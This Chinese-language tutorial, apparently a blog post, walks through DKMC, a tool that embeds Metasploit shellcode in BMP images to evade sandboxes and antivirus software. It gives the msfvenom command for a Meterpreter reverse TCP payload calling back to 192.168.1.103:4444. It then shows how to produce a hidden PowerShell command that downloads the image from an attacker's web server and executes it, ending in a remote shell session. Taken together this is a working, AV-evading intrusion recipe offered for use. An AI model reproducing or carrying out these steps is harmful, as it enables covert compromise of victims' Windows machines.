背景
和往常一样,我习惯般的浏览着一些国外的技术站点。其中某个技术视频中所使用的一款工具引起了我的注意,这款工具的名字也非常特别叫做DKMC(Don’t Kill My Cat ),直译为不要杀我的猫。从其GitHub上的介绍来看,DKMC是一款用于将shellcode代码混淆至图片文件格式的工具。其目的是为了有效躲避沙盒分析及杀毒软件的查杀。目前,该工具最终的shellcode payload执行仅支持PowerShell。
基本流程(过程)
- 生成shellcode (msfvenom)
- 将msf的shellcode嵌入到图片内
- PowerShell下载图片并执行图片作为shellcode
- 得到 shell
安装使用
$ git clone https://github.com/Mr-Un1k0d3r/DKMC $ cd DKMC $ mkdir output
使用准备
1.将所有类型的图片都转换bmp格式,关于如何转换可自行百度在线转换地址。我这里已经提前转换好了:
2.准备一枚由msfvenom 生成的PAYLOAD,使用为未初始化的格式
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORt=4444 -f raw >demon
3.启动msfconsole (控制台),进行监听
运行DKMC
首先,我们进入它的初始界面
先来简单介绍一下:
- sc功能是将msf生成的raw文件 转换位shellcode代码
- gen功能是将其msf的shellcode注入到BMP 图片中
- ps功能将其BMP的图片转换为powershell代码
- web功能将其开启web功能
1.首先我们要用到的是sc功能
(将其msf的shellcode注入到BMP图片中)
设置msfvenom生成的文件路径,然后run生成shellcode
(shellcode)>>> set source demon [+] source value is set. (shellcode)>>>?run
将其shellcode代码进行保存,或者保存到文本文档 ,一会需要用到。我们使用exit退出当前模块,回到主菜单界面:
2.gen功能
(是将其msf的shellcode注入到BMP图片中)
这里需要设置两个地方:
- 转换后的bmp图片文件
- 设置shellcode
之后run ,output中会生成一个新的bmp是由msfpayload注入生成的,之后我们还是一样exit,退回主界面使用ps功能。
3.ps功能
(功能将其BMP的图片转换为powershell代码)
这里需要设置的是url 这块,格式 set url?http://ip地址?:端口号 /x.bmp
(powershell)>>> set url http://192.168.1.103:8081/output-1506265715.bmp [+] url value is set. (powershell)>>>?run [+]?Powershell?script: powershell.exe?-nop?-w?hidden
复制powershell代码 到文本文档 (可将其编辑格式为bat 或者ps1 即可)(本文不编辑其他格式直接复制粘贴代码)
4.web功能(开启web服务)
folder 我这里就不设置他 ,因为bmp 生成的默认地址就是这个,需要改动的是我之前设置了url端口为8081,所以我这里也需要设置的一样为8081
5.运行代码,得到会话
得到会话,(这里我直接复制粘贴代码,可以选择将其编辑为bat、ps1、exe等格式运行)